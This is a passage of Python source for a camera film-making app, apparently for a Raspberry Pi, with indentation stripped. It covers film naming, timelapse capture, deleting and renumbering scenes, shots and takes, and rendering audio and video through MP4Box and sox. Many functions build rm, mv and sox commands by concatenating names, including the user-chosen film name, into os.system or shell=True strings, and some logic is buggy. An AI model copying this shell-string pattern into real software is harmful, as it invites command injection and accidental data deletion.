pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
films = getfilms(filmfolder)
filmstotal = len(films[1:])
selectedfilm = 0
selected = 0
header = 'Up and down to select and load film'
menu = 'FILM:', 'BACK'
while True:
settings = films[selectedfilm][0], ''
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'down':
if selectedfilm < filmstotal:
selectedfilm = selectedfilm + 1
elif pressed == 'up':
if selectedfilm > 0:
selectedfilm = selectedfilm - 1
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'FILM:':
filmname = films[selectedfilm][0]
return filmname
elif pressed == 'middle' and menu[selected] == 'BACK':
writemessage('Returning')
return filmname
time.sleep(0.02)
#-------------New film----------------
def nameyourfilm(filmfolder, filmname, abc, newfilm):
oldfilmname = filmname
if newfilm == True:
filmname = ''
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
abcx = 0
helpmessage = 'Up, Down (select characters) Right (next). Middle (done), Retake (Cancel)'
cursor = '_'
blinking = True
pausetime = time.time()
while True:
if newfilm == True:
message = 'New film name: ' + filmname
else:
message = 'Edit film name: ' + filmname
writemessage(message + cursor)
vumetermessage(helpmessage)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if event == ' ':
event = '_'
if pressed == 'down':
pausetime = time.time()
if abcx < (len(abc) - 1):
abcx = abcx + 1
cursor = abc[abcx]
elif pressed == 'up':
pausetime = time.time()
if abcx > 0:
abcx = abcx - 1
cursor = abc[abcx]
elif pressed == 'right':
pausetime = time.time()
if len(filmname) < 30:
filmname = filmname + abc[abcx]
cursor = abc[abcx]
else:
helpmessage = 'Yo, maximum characters reached bro!'
elif pressed == 'left' or pressed == 'remove':
pausetime = time.time()
if len(filmname) > 0:
filmname = filmname[:-1]
cursor = abc[abcx]
elif pressed == 'middle' or event == 10:
if len(filmname) > 0:
if abc[abcx] != '_':
filmname = filmname + abc[abcx]
try:
if filmname == oldfilmname:
return oldfilmname
elif filmname in getfilms(filmfolder)[0]:
helpmessage = 'this filmname is already taken! pick another name!'
elif filmname not in getfilms(filmfolder)[0]:
logger.info("New film " + filmname)
return(filmname)
except:
logger.info("New film " + filmname)
return(filmname)
elif pressed == 'retake':
return oldfilmname
elif event in abc:
pausetime = time.time()
filmname = filmname + event
if time.time() - pausetime > 0.5:
if blinking == True:
cursor = abc[abcx]
if blinking == False:
cursor = ' '
blinking = not blinking
pausetime = time.time()
time.sleep(keydelay)
#------------Timelapse--------------------------
def timelapse(beeps,camera,foldername,filename,between,duration):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
sound = False
selected = 0
header = 'Adjust delay in seconds between images'
menu = 'DELAY:', 'DURATION:', 'START', 'BACK'
while True:
settings = str(round(between,2)), str(round(duration,2)), '', ''
writemenu(menu,settings,selected,header)
seconds = (3600 / between) * duration
vumetermessage('1 h timelapse filming equals ' + str(round(seconds,2)) + ' second clip ')
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'up' and menu[selected] == 'DELAY:':
between = between + 1
elif pressed == 'down' and menu[selected] == 'DELAY:':
if between > 1:
between = between - 1
elif pressed == 'up' and menu[selected] == 'DURATION:':
duration = duration + 0.1
elif pressed == 'down' and menu[selected] == 'DURATION:':
if duration > 0.3:
duration = duration - 0.1
elif pressed == 'up' or pressed == 'down' and menu[selected] == 'SOUND:':
if sound == False:
sound == True
if sound == True:
sound == False
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
if menu[selected] == 'START':
os.makedirs(foldername + 'timelapse')
time.sleep(0.02)
writemessage('Recording timelapse, middlebutton to stop')
n = 1
recording = False
starttime = time.time()
t = 0
files = []
while True:
t = time.time() - starttime
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
vumetermessage('Timelapse lenght is now ' + str(round(n * duration,2)) + ' second clip ')
if recording == False and t > between:
if beeps > 0:
buzz(150)
camera.start_recording(foldername + 'timelapse/' + filename + '_' + str(n).zfill(3) + '.h264', format='h264', quality=26, bitrate=5000000)
if sound == True:
os.system(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D hw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r 44100 -vv /dev/shm/' + filename + '_' + str(n).zfill(3) + '.wav &')
files.append(foldername + 'timelapse/' + filename + '_' + str(n).zfill(3))
starttime = time.time()
recording = True
n = n + 1
t = 0
if recording == True:
writemessage('Recording timelapse ' + str(n) + ' ' + 'time:' + str(round(t,2)))
if recording == False:
writemessage('Between timelapse ' + str(n) + ' ' + 'time:' + str(round(t,2)))
if t > duration and recording == True:
if sound == True:
os.system('pkill arecord')
camera.stop_recording()
recording = False
starttime = time.time()
t = 0
if pressed == 'middle' and n > 1:
if recording == True:
os.system('pkill arecord')
camera.stop_recording()
#create thumbnail
try:
camera.capture(foldername + filename + '.jpeg', resize=(800,340), use_video_port=True)
except:
logger.warning('something wrong with camera jpeg capture')
writemessage('Compiling timelapse')
logger.info('Hold on, rendering ' + str(len(files)) + ' scenes')
#RENDER VIDEO
renderfilename = foldername + filename
n = 1
videomerge = ['MP4Box']
videomerge.append('-force-cat')
for f in files:
if sound == True:
compileshot(f)
audiotrim(foldername + 'timelapse/', filename + '_' + str(n).zfill(3), 'end')
else:
videomerge.append('-cat')
videomerge.append(f + '.h264')
n = n + 1
videomerge.append('-new')
videomerge.append(renderfilename + '.mp4')
call(videomerge, shell=False) #how to insert somekind of estimated time while it does this?
##RENDER AUDIO
if sound == True:
writemessage('Rendering sound')
audiomerge = ['sox']
#if render > 2:
# audiomerge.append(filename + '.wav')
for f in files:
audiomerge.append(f + '.wav')
audiomerge.append(renderfilename + '.wav')
call(audiomerge, shell=False)
##MAKE AUDIO SILENCE
if sound == False:
audiosilence(foldername,filename)
#cleanup
#os.system('rm -r ' + foldername + 'timelapse')
vumetermessage('timelapse done! ;)')
return renderfilename, between, duration
time.sleep(keydelay)
if menu[selected] == 'BACK':
vumetermessage('ok!')
return '', between, duration
time.sleep(keydelay)
#------------Remove-----------------------
def remove(filmfolder, filmname, scene, shot, take, sceneshotortake):
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(take).zfill(3)
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
time.sleep(0.1)
header = 'Are you sure you want to remove ' + sceneshotortake + '?'
menu = '', ''
settings = 'NO', 'YES'
selected = 0
while True:
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle':
if selected == 1:
if sceneshotortake == 'take':
os.system('rm ' + foldername + filename + '.h264')
os.system('rm ' + foldername + filename + '.mp4')
os.system('rm ' + foldername + filename + '.wav')
os.system('rm ' + foldername + filename + '.jpeg')
take = take - 1
if take == 0:
take = 1
elif sceneshotortake == 'shot' and shot > 0:
writemessage('Removing shot ' + str(shot))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
os.system('rm -r ' + foldername)
take = counttakes(filmname, filmfolder, scene, shot)
elif sceneshotortake == 'scene':
writemessage('Removing scene ' + str(scene))
foldername = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3)
os.system('rm -r ' + foldername)
scene = countscenes(filmfolder, filmname)
shot = 1
take = 1
elif sceneshotortake == 'film':
foldername = filmfolder + filmname
os.system('rm -r ' + foldername)
return
elif selected == 0:
return
time.sleep(0.02)
#------------Remove and Organize----------------
def organize(filmfolder, filmname):
scenes = next(os.walk(filmfolder + filmname))[1]
for i in scenes:
if 'scene' not in i:
scenes.remove(i)
# Takes
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
for p in sorted(shots):
takes = next(os.walk(filmfolder + filmname + '/' + i + '/' + p))[2]
if len(takes) == 0:
logger.info('no takes in this shot, removing shot..')
os.system('rm -r ' + filmfolder + filmname + '/' + i + '/' + p)
organized_nr = 1
for s in sorted(takes):
if '.mp4' in s or '.h264' in s:
#print(s)
unorganized_nr = int(s[4:7])
takename = filmfolder + filmname + '/' + i + '/' + p + '/take' + str(unorganized_nr).zfill(3)
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
mv = 'mv ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(unorganized_nr).zfill(3)
run_command(mv + '.mp4 ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.mp4')
run_command(mv + '.h264 ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.h264')
run_command(mv + '.wav ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.wav')
run_command(mv + '.jpeg ' + filmfolder + filmname + '/' + i + '/' + p + '/take' + str(organized_nr).zfill(3) + '.jpeg')
#check if same video has both h246 and mp4 and render and remove h264
duplicate = ''
if '.mp4' in s:
duplicate = s.strip('.mp4')
if duplicate == s.strip('.h264'):
logger.info('Found both mp4 and h264 of same video!')
compileshot(takename)
else:
organized_nr += 1
# Shots
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
if len(shots) == 0:
logger.info('no shots in this scene, removing scene..')
os.system('rm -r ' + filmfolder + filmname + '/' + i)
organized_nr = 1
for p in sorted(shots):
if 'insert' in p:
#add_organize(filmfolder, filmname)
pass
elif 'shot' in p:
#print(p)
unorganized_nr = int(p[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv ' + filmfolder + filmname + '/' + i + '/shot' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
organized_nr += 1
# Scenes
organized_nr = 1
for i in sorted(scenes):
if 'insert' in i:
#add_organize(filmfolder, filmname)
pass
elif 'scene' in i:
#print(i)
unorganized_nr = int(i[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv ' + filmfolder + filmname + '/scene' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
organized_nr += 1
logger.info('Organizer done! Everything is tidy')
return
#------------Add and Organize----------------
def add_organize(filmfolder, filmname):
scenes = next(os.walk(filmfolder + filmname))[1]
for i in scenes:
if 'scene' not in i:
scenes.remove(i)
# Shots
for i in sorted(scenes):
shots = next(os.walk(filmfolder + filmname + '/' + i))[1]
for c in shots:
if 'shot' not in c:
shots.remove(c)
organized_nr = len(shots)
for p in sorted(shots, reverse=True):
if 'yanked' in p:
#print(p)
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr - 1).zfill(3) + '_yanked ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
elif 'insert' in p:
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr - 1).zfill(3) + '_insert ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
run_command('touch ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3) + '/.placeholder')
elif 'shot' in p:
#print(p)
unorganized_nr = int(p[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv -n ' + filmfolder + filmname + '/' + i + '/shot' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/' + i + '/shot' + str(organized_nr).zfill(3))
organized_nr -= 1
# Scenes
organized_nr = len(scenes)
for i in sorted(scenes, reverse=True):
#print(i)
if 'yanked' in i:
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(organized_nr - 1).zfill(3) + '_yanked ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
elif 'insert' in i:
#print(p)
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(organized_nr - 1).zfill(3) + '_insert ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
run_command('touch ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3) + '/.placeholder')
elif 'scene' in i:
#print(i)
unorganized_nr = int(i[-3:])
if organized_nr == unorganized_nr:
#print('correct')
pass
if organized_nr != unorganized_nr:
#print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
os.system('mv -n ' + filmfolder + filmname + '/scene' + str(unorganized_nr).zfill(3) + ' ' + filmfolder + filmname + '/scene' + str(organized_nr).zfill(3))
organized_nr -= 1
return
#-------------Compile Shot--------------
def compileshot(filename):
#Check if file already converted
if os.path.isfile(filename + '.h264'):
logger.info('Video not converted!')
writemessage('Converting to playable video')
#remove old mp4
os.system('rm ' + filename + '.mp4')
run_command('MP4Box -fps 25 -add ' + filename + '.h264 ' + filename + '.mp4')
delayerr = audiotrim(filename, 'end')
os.system('rm ' + filename + '.h264')
#run_command('omxplayer --layer 3 ' + filmfolder + '/.rendered/' + filename + '.mp4 &')
#time.sleep(0.8)
#run_command('aplay ' + foldername + filename + '.wav')
#-------------Get shot files--------------
def shotfiles(filmfolder, filmname, scene):
files = []
shots = countshots(filmname,filmfolder,scene)
shot = 1
while shot <= shots:
takes = counttakes(filmname,filmfolder,scene,shot)
if takes > 0:
folder = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/shot' + str(shot).zfill(3) + '/'
filename = 'take' + str(takes).zfill(3)
files.append(folder + filename)
shot = shot + 1
#writemessage(str(len(shotfiles)))
#time.sleep(2)
return files
#---------------Render Video------------------
def rendervideo(filmfiles, filename, renderinfo):
if len(filmfiles) < 1:
writemessage('Nothing here!')
time.sleep(2)
return None
print('Rendering videofiles')
writemessage('Hold on, rendering ' + renderinfo + ' with ' + str(len(filmfiles)) + ' files')
videosize = 0
rendersize = 0
videomerge = ['MP4Box']
videomerge.append('-force-cat')
for f in filmfiles[:]:
videosize = videosize + countsize(f + '.mp4')
videomerge.append('-cat')
videomerge.append(f + '.mp4')
videomerge.append('-new')
videomerge.append(filename + '.mp4')
#videomerge.append(filename + '.h264')
#call(videomerge, shell=True) #how to insert somekind of estimated time while it does this?
p = Popen(videomerge)
#show progress
while p.poll() is None:
time.sleep(0.1)
try:
rendersize = countsize(filename + '.mp4')
except:
continue
writemessage('video rendering ' + str(int(rendersize)) + ' of ' + str(int(videosize)) + ' kb done')
print('Video rendered!')
return
#---------------Render Audio----------------
def renderaudio(audiofiles, filename, dubfiles, dubmix):
#if len(audiofiles) < 1:
# writemessage('Nothing here!')
# time.sleep(2)
# return None
print('Rendering audiofiles')
##PASTE AUDIO TOGETHER
writemessage('Hold on, rendering audio...')
audiomerge = ['sox']
#if render > 2:
# audiomerge.append(filename + '.wav')
for f in audiofiles:
audiomerge.append(f + '.wav')
audiomerge.append(filename + '.wav')
call(audiomerge, shell=False)
#DUBBING
p = 1
for i, d in zip(dubmix, dubfiles):
writemessage('Dub ' + str(p) + ' audio found lets mix...')
pipe = subprocess.check_output('soxi -D ' + filename + '.wav', shell=True)
audiolenght = pipe.decode()
os.system('cp ' + filename + '.wav ' + filename + '_tmp.wav')
#Fade
run_command('sox -V0 -G ' + d + ' /dev/shm/fade.wav fade ' + str(round(i[2],1)) + ' 0 ' + str(round(i[3],1)))
run_command('sox -V0 -G -m -v ' + str(round(i[0],1)) + ' /dev/shm/fade.wav -v ' + str(round(i[1],1)) + ' ' + filename + '_tmp.wav ' + filename + '.wav trim 0 ' + audiolenght)
os.remove(filename + '_tmp.wav')
os.remove('/dev/shm/fade.wav')
print('Dub mix ' + str(p) + ' done!')
p += 1
return
#-------------Get scene files--------------
def scenefiles(filmfolder, filmname):
files = []
scenes = countscenes(filmfolder,filmname)
scene = 1
while scene <= scenes:
folder = filmfolder + filmname + '/' + 'scene' + str(scene).zfill(3) + '/'
filename = 'scene'
files.append(folder + filename)
scene = scene + 1
#writemessage(str(len(shotfiles)))
#time.sleep(2)
return files
#-------------Render Scene-------------
def renderscene(filmfolder, filmname, scene):
#This function checks and calls rendervideo & renderaudio if something has changed in the film
#Video
videohash = ''
oldvideohash = ''
filmfiles = shotfiles(filmfolder, filmname, scene)
renderfilename = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/scene'
scenedir = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/'
# Check if video corrupt
renderfix = False
try:
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + renderfilename + '.mp4', shell=True)
videolenght = pipe.decode().strip()
except:
videolenght = ''
print('Scene lenght ' + videolenght)
if videolenght == '':
print('Okey, scene file not found or is corrupted')
# For backwards compatibility remove old rendered scene files
run_command('rm ' + renderfilename + '*')
renderfix = True
# Video Hash
for p in filmfiles:
compileshot(p)
videohash = videohash + str(int(countsize(p + '.mp4')))
print('Videohash of scene is: ' + videohash)
try:
with open(scenedir + '.videohash', 'r') as f:
oldvideohash = f.readline().strip()
print('oldvideohash is: ' + oldvideohash)
except:
print('no videohash found, making one...')
with open(scenedir + '.videohash', 'w') as f:
f.write(videohash)
# Render if needed
if videohash != oldvideohash or renderfix == True:
rendervideo(filmfiles, renderfilename, 'scene ' + str(scene))
print('updating videohash...')
with open(scenedir + '.videohash', 'w') as f:
f.write(videohash)
#Audio
audiohash = ''
oldaudiohash = ''
newaudiomix = False
for p in filmfiles:
audiohash += str(int(countsize(p + '.wav')))
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
for p in dubfiles:
audiohash += str(int(countsize(p)))
print('Audiohash of scene is: ' + audiohash)
try:
with open(scenedir + '.audiohash', 'r') as f:
oldaudiohash = f.readline().strip()
print('oldaudiohash is: ' + oldaudiohash)
except:
print('no audiohash found, making one...')
with open(scenedir + '.audiohash', 'w') as f:
f.write(audiohash)
if audiohash != oldaudiohash or newmix == True or renderfix == True:
renderaudio(filmfiles, renderfilename, dubfiles, dubmix)
print('updating audiohash...')
with open(scenedir + '.audiohash', 'w') as f:
f.write(audiohash)
for i in range(len(dubfiles)):
os.system('cp ' + scenedir + '/dub/.settings' + str(i + 1).zfill(3) + ' ' + scenedir + '/dub/.rendered' + str(i + 1).zfill(3))
print('Audio rendered!')
newaudiomix = True
else:
print('Already rendered!')
return renderfilename, newaudiomix
#-------------Render film------------
def renderfilm(filmfolder, filmname, comp, scene, muxing):
def render(q, filmfolder, filmname, comp, scene):
newaudiomix = False
#This function checks and calls renderscene first then rendervideo & renderaudio if something has changed in the film
if scene > 0:
scenefilename, audiomix = renderscene(filmfolder, filmname, scene)
q.put(scenefilename)
return
scenes = countscenes(filmfolder, filmname)
for i in range(scenes):
scenefilename, audiomix = renderscene(filmfolder, filmname, i + 1)
#Check if a scene has a new audiomix
print('audiomix of scene ' + str(i + 1) + ' is ' + str(audiomix))
if audiomix == True:
newaudiomix = True
filmfiles = scenefiles(filmfolder, filmname)
#Video
videohash = ''
oldvideohash = ''
renderfilename = filmfolder + filmname + '/' + filmname
filmdir = filmfolder + filmname + '/'
for p in filmfiles:
print(p)
compileshot(p)
videohash += str(int(countsize(p + '.mp4')))
print('Videohash of film is: ' + videohash)
try:
with open(filmdir + '.videohash', 'r') as f:
oldvideohash = f.readline().strip()
print('oldvideohash is: ' + oldvideohash)
except:
print('no videohash found, making one...')
with open(filmdir + '.videohash', 'w') as f:
f.write(videohash)
if videohash != oldvideohash:
rendervideo(filmfiles, renderfilename, filmname)
print('updating video hash')
with open(filmdir + '.videohash', 'w') as f:
f.write(videohash)
#Audio
audiohash = ''
oldaudiohash = ''
for p in filmfiles:
print(p)
audiohash += str(int(countsize(p + '.wav')))
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, '')
for p in dubfiles:
audiohash += str(int(countsize(p)))
print('Audiohash of film is: ' + audiohash)
try:
with open(filmdir + '.audiohash', 'r') as f:
oldaudiohash = f.readline().strip()
print('oldaudiohash is: ' + oldaudiohash)
except:
print('no audiohash found, making one...')
with open(filmdir+ '.audiohash', 'w') as f:
f.write(audiohash)
#This is if the scene has a new audiomix
if newaudiomix == True:
newmix = True
if audiohash != oldaudiohash or newmix == True:
renderaudio(filmfiles, renderfilename, dubfiles, dubmix)
print('updating audiohash...')
with open(filmdir+ '.audiohash', 'w') as f:
f.write(audiohash)
for i in range(len(dubfiles)):
os.system('cp ' + filmdir + '/dub/.settings' + str(i + 1).zfill(3) + ' ' + filmdir + '/dub/.rendered' + str(i + 1).zfill(3))
print('Audio rendered!')
#compressing
if comp > 0:
writemessage('compressing audio')
os.system('mv ' + renderfilename + '.wav ' + renderfilename + '_tmp.wav')
run_command('sox ' + renderfilename + '_tmp.wav ' + renderfilename + '.wav compand 0.3,1 6:-70,-60,-20 -5 -90 0.2')
os.remove(renderfilename + '_tmp.wav')
if muxing == True:
#muxing mp3 layer to mp4 file
#count estimated audio filesize with a bitrate of 320 kb/s
audiosize = countsize(renderfilename + '.wav') * 0.453
os.system('mv ' + renderfilename + '.mp4 ' + renderfilename + '_tmp.mp4')
if debianversion == 'stretch':
p = Popen(['avconv', '-y', '-i', renderfilename + '.wav', '-acodec', 'libmp3lame', '-b:a', '320k', renderfilename + '.mp3'])
else:
p = Popen(['ffmpeg', '-y', '-i', renderfilename + '.wav', '-acodec', 'libmp3lame', '-b:a', '320k', renderfilename + '.mp3'])
while p.poll() is None:
time.sleep(0.2)
try:
rendersize = countsize(renderfilename + '.mp3')
except:
continue
writemessage('audio rendering ' + str(int(rendersize)) + ' of ' + str(int(audiosize)) + ' kb done')
##MERGE AUDIO & VIDEO
writemessage('Merging audio & video')
#os.remove(renderfilename + '.mp4')
call(['MP4Box', '-rem', '2', renderfilename + '_tmp.mp4'], shell=False)
call(['MP4Box', '-add', renderfilename + '_tmp.mp4', '-add', renderfilename + '.mp3', '-new', renderfilename + '.mp4'], shell=False)
os.remove(renderfilename + '_tmp.mp4')
os.remove(renderfilename + '.mp3')
else:
print('Already rendered!')
q.put(renderfilename)
q = mp.Queue()
proc = mp.Process(target=render, args=(q,filmfolder,filmname,comp,scene))
proc.start()
procdone = False
status = ''
vumetermessage('press middlebutton to cancel')
while True:
if proc.is_alive() == False and procdone == False:
status = q.get()
print(status)
procdone = True
proc.join()
renderfilename = status
vumetermessage('')
break
if middlebutton() == True:
proc.terminate()
proc.join()
procdone = True
os.system('pkill MP4Box')
vumetermessage('canceled for now, maybe u want to render later ;)')
renderfilename = ''
break
return renderfilename
#-------------Get dub files-----------
def getdubs(filmfolder, filmname, scene):
#search for dub files
print('getting scene dubs')
dubfiles = []
dubmix = []
rerender = False
if scene:
filefolder = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/dub/'
else:
filefolder = filmfolder + filmname + '/dub/'
try:
allfiles = os.listdir(filefolder)
except:
print('no dubs')
return dubfiles, dubmix, rerender
for a in allfiles:
if 'dub' in a:
print('Dub audio found! ' + filefolder + a)
dubfiles.append(filefolder + a)
#check if dub mix has changed
dubnr = 1
for i in dubfiles:
dub = []
rendered_dub = []
try:
with open(filefolder + '.settings' + str(dubnr).zfill(3), 'r') as f:
dubstr = f.read().splitlines()
for i in dubstr:
dub.append(float(i))
print('dub ' + str(dubnr).zfill(3) + ' loaded!')
print(dub)
except:
print('cant find settings file')
dub = [1.0, 1.0, 0.0, 0.0]
with open(filefolder + ".settings" + str(dubnr).zfill(3), "w") as f:
for i in dub:
f.write(str(i) + '\n')
try:
with open(filefolder + '.rendered' + str(dubnr).zfill(3), 'r') as f:
dubstr = f.read().splitlines()
for i in dubstr:
rendered_dub.append(float(i))
print('rendered dub loaded')
print(rendered_dub)
except:
print('no rendered dubmix found!')
if rendered_dub != dub:
rerender = True
dubmix.append(dub)
dubnr += 1
return dubfiles, dubmix, rerender
#------------Remove Dubs----------------
def removedub(dubfolder, dubnr):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
header = 'Are you sure you want to remove dub ' + str(dubnr) + '?'
menu = 'NO', 'YES'
settings = '', ''
while True:
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(menu) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and selected == 0:
logger.info('dont remove dub')
time.sleep(0.3)
break
elif pressed == 'middle' and selected == 1:
os.system('rm ' + dubfolder + 'dub' + str(dubnr).zfill(3) + '.wav')
os.system('rm ' + dubfolder + '.settings' + str(dubnr).zfill(3))
os.system('rm ' + dubfolder + '.rendered' + str(dubnr).zfill(3))
time.sleep(0.5)
print(dubfolder)
dubs = next(os.walk(dubfolder))[2]
print(dubs)
for i in dubs:
if 'dub' not in i:
dubs.remove(i)
organized_nr = 1
for s in sorted(dubs):
if '.wav' in s:
print(s)
unorganized_nr = int(s[3:-4])
if organized_nr == unorganized_nr:
print('correct')
pass
if organized_nr != unorganized_nr:
print('false, correcting from ' + str(unorganized_nr) + ' to ' + str(organized_nr))
run_command('mv ' + dubfolder + 'dub' + str(unorganized_nr).zfill(3) + '.wav ' + dubfolder + 'dub' + str(organized_nr).zfill(3) + '.wav')
run_command('mv ' + dubfolder + '.settings' + str(unorganized_nr).zfill(3) + ' ' + dubfolder + '.settings' + str(organized_nr).zfill(3))
run_command('mv ' + dubfolder + '.rendered' + str(unorganized_nr).zfill(3) + ' ' + dubfolder + '.rendered' + str(organized_nr).zfill(3))
organized_nr += 1
logger.info('removed dub file!')
vumetermessage('dub removed!')
break
time.sleep(0.05)
#-------------Clip settings---------------
def clipsettings(filmfolder, filmname, scene, plughw):
vumetermessage('press record, view or retake to be dubbing')
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
selected = 0
dubfiles = []
dubmix = []
dubmix_old = []
if scene:
header = 'Scene ' + str(scene) + ' dubbing settings'
filefolder = filmfolder + filmname + '/scene' + str(scene).zfill(3) + '/dub/'
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
else:
header = 'Film ' + filmname + ' dubbing settings'
filefolder = filmfolder + filmname + '/dub/'
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, '')
newdub = [1.0, 1.0, 0.1, 0.1]
dubselected = len(dubfiles) - 1
dubrecord = ''
while True:
nmix = round(newdub[0],1)
ndub = round(newdub[1],1)
nfadein = round(newdub[2],1)
nfadeout = round(newdub[3],1)
if dubfiles:
mix = round(dubmix[dubselected][0],1)
dub = round(dubmix[dubselected][1],1)
fadein = round(dubmix[dubselected][2],1)
fadeout = round(dubmix[dubselected][3],1)
menu = 'BACK', 'ADD:', '', '', 'DUB' + str(dubselected + 1) + ':', '', '', ''
settings = '', 'd:' + str(nmix) + '/o:' + str(ndub), 'in:' + str(nfadein), 'out:' + str(nfadeout), '', 'd:' + str(mix) + '/o' + str(dub), 'in:' + str(fadein), 'out:' + str(fadeout)
else:
menu = 'BACK', 'ADD:', '', ''
settings = '', 'd:' + str(nmix) + '/o:' + str(ndub), 'in:' + str(nfadein), 'out:' + str(nfadeout)
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
#NEW DUB SETTINGS
if pressed == 'up' and selected == 1:
if newdub[0] > 0.99 and newdub[1] > 0.01:
newdub[1] -= 0.1
if newdub[1] > 0.99 and newdub[0] < 0.99:
newdub[0] += 0.1
elif pressed == 'down' and selected == 1:
if newdub[1] > 0.99 and newdub[0] > 0.01:
newdub[0] -= 0.1
if newdub[0] > 0.99 and newdub[1] < 0.99:
newdub[1] += 0.1
elif pressed == 'up' and selected == 2:
newdub[2] += 0.1
elif pressed == 'down' and selected == 2:
if newdub[2] > 0.01:
newdub[2] -= 0.1
elif pressed == 'up' and selected == 3:
newdub[3] += 0.1
elif pressed == 'down' and selected == 3:
if newdub[3] > 0.01:
newdub[3] -= 0.1
elif pressed == 'record' and selected == 1:
dubmix.append(newdub)
dubrecord = filefolder + 'dub' + str(len(dubmix)).zfill(3) + '.wav'
break
#DUB SETTINGS
elif pressed == 'up' and selected == 4:
if dubselected + 1 < len(dubfiles):
dubselected = dubselected + 1
elif pressed == 'down' and selected == 4:
if dubselected > 0:
dubselected = dubselected - 1
elif pressed == 'remove' and selected == 4:
removedub(filefolder, dubselected + 1)
dubfiles, dubmix, newmix = getdubs(filmfolder, filmname, scene)
dubselected = len(dubfiles) - 1
if len(dubfiles) == 0:
selected = 0
elif pressed == 'record' and selected == 4:
dubrecord = filefolder + 'dub' + str(dubselected + 1).zfill(3) + '.wav'
break
elif pressed == 'up' and selected == 5:
if dubmix[dubselected][0] >= 0.99 and dubmix[dubselected][1] > 0.01:
dubmix[dubselected][1] -= 0.1
if dubmix[dubselected][1] >= 0.99 and dubmix[dubselected][0] < 0.99:
dubmix[dubselected][0] += 0.1
elif pressed == 'down' and selected == 5:
